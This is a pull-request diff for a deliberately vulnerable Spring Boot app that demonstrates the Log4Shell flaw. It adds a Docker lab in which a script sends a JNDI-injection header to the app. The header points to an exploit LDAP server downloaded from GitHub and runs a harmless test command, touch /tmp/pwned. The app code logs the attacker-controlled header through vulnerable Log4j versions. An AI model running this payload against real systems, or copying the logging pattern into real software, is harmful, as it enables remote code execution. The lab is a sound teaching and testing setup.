Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
6 changes: 6 additions & 0 deletions Dockerfile-exploit
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
FROM debian:stretch
EXPOSE 8080
ADD exploit.sh .
RUN apt-get -y update && apt-get -y install wait-for-it curl
CMD ["wait-for-it", "app:8080", "-t", "10", "--", "bash", "exploit.sh"]

6 changes: 6 additions & 0 deletions Dockerfile-jndi
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
FROM openjdk:8u181-jdk-alpine
EXPOSE 8888
EXPOSE 1389
RUN mkdir /app
RUN cd /app && wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip && unzip JNDIExploit.v1.2.zip
CMD ["java", "-jar", "/app/JNDIExploit-1.2-SNAPSHOT.jar", "-i", "jndi", "-p", "8888"]
13 changes: 5 additions & 8 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -4,21 +4,18 @@ This repository contains a Spring Boot web application vulnerable to CVE-2021-44

It uses Log4j 2.14.1 (through `spring-boot-starter-log4j2` 2.6.1) and the JDK 1.8.0_181.

Now in a fully self-contained docker lab environment (thanks to @darylrobbins).

![](./screenshot.png)

## Running the application

Run it:
Run a complete Docker security lab environment for log4shell:

```bash
docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
docker-compose up
```

Build it yourself (you don't need any Java-related tooling):

```bash
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app
```

## Exploitation steps
Expand Down Expand Up @@ -73,4 +70,4 @@ https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/
## Contributors

[@christophetd](https://twitter.com/christophetd)
[@rayhan0x01](https://twitter.com/rayhan0x01)
[@rayhan0x01](https://twitter.com/rayhan0x01)
4 changes: 3 additions & 1 deletion build.gradle
Original file line number Diff line number Diff line change
Expand Up @@ -17,7 +17,9 @@ dependencies {
exclude group: 'org.springframework.boot', module: 'spring-boot-starter-logging'
}
implementation 'org.springframework.boot:spring-boot-starter-log4j2:2.6.1'
testImplementation 'org.springframework.boot:spring-boot-starter-test'
// https://mvnrepository.com/artifact/log4j/log4j
implementation group: 'log4j', name: 'log4j', version: '1.2.16'
testImplementation 'org.springframework.boot:spring-boot-starter-test'
}

test {
Expand Down
31 changes: 31 additions & 0 deletions docker-compose.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,31 @@
version: "3.9" # optional since v1.27.0
services:
jndi:
build:
context: .
dockerfile: Dockerfile-jndi
ports:
- "8888:8888"
- "1389:1389"
app:
build: .
ports:
- "8080:8080"
volumes:
- tmp:/tmp
links:
- jndi
depends_on:
- jndi
exploit:
build:
context: .
dockerfile: Dockerfile-exploit
volumes:
- tmp:/tmp
depends_on:
- app
- jndi

volumes:
tmp:
12 changes: 12 additions & 0 deletions exploit.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
#!/bin/bash
curl app:8080 -H 'X-Api-Version: ${jndi:ldap://jndi:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
sleep 5

filename=/tmp/pwned
if [ -f "$filename" ];
then
echo "Regrettably, you've been pwned :("
echo "This configuration is vulnerable to log4shell"
else
echo "It looks like you're safe!"
fi
Original file line number Diff line number Diff line change
@@ -1,6 +1,7 @@
package fr.christophetd.log4shell.vulnerableapp;


import org.springframework.beans.factory.annotation.Value;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestHeader;
import org.springframework.web.bind.annotation.RestController;
Expand All @@ -11,12 +12,20 @@
@RestController
public class MainController {

private static final Logger logger = LogManager.getLogger("HelloWorld");
private static final org.apache.log4j.Logger logger1 = org.apache.log4j.Logger.getLogger("HelloWorld1");
private static final Logger logger2 = LogManager.getLogger("HelloWorld2");

@Value("${log4j.version:2}")
private String log4j_version;

@GetMapping("/")
public String index(@RequestHeader("X-Api-Version") String apiVersion) {
logger.info("Received a request for API version " + apiVersion);
return "Hello, world!";
if ("1".equals(log4j_version)) {
logger1.info("Hello from log4j v1 " + apiVersion);
} else {
logger2.info("Received a request for API version using log4j v2 " + apiVersion);
}
return "Hello, world!";
}

}
}
Original file line number Diff line number Diff line change
@@ -1,13 +1,15 @@
package fr.christophetd.log4shell.vulnerableapp;

import org.apache.log4j.BasicConfigurator;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;

@SpringBootApplication
public class VulnerableAppApplication {

public static void main(String[] args) {
SpringApplication.run(VulnerableAppApplication.class, args);
BasicConfigurator.configure();
SpringApplication.run(VulnerableAppApplication.class, args);
}

}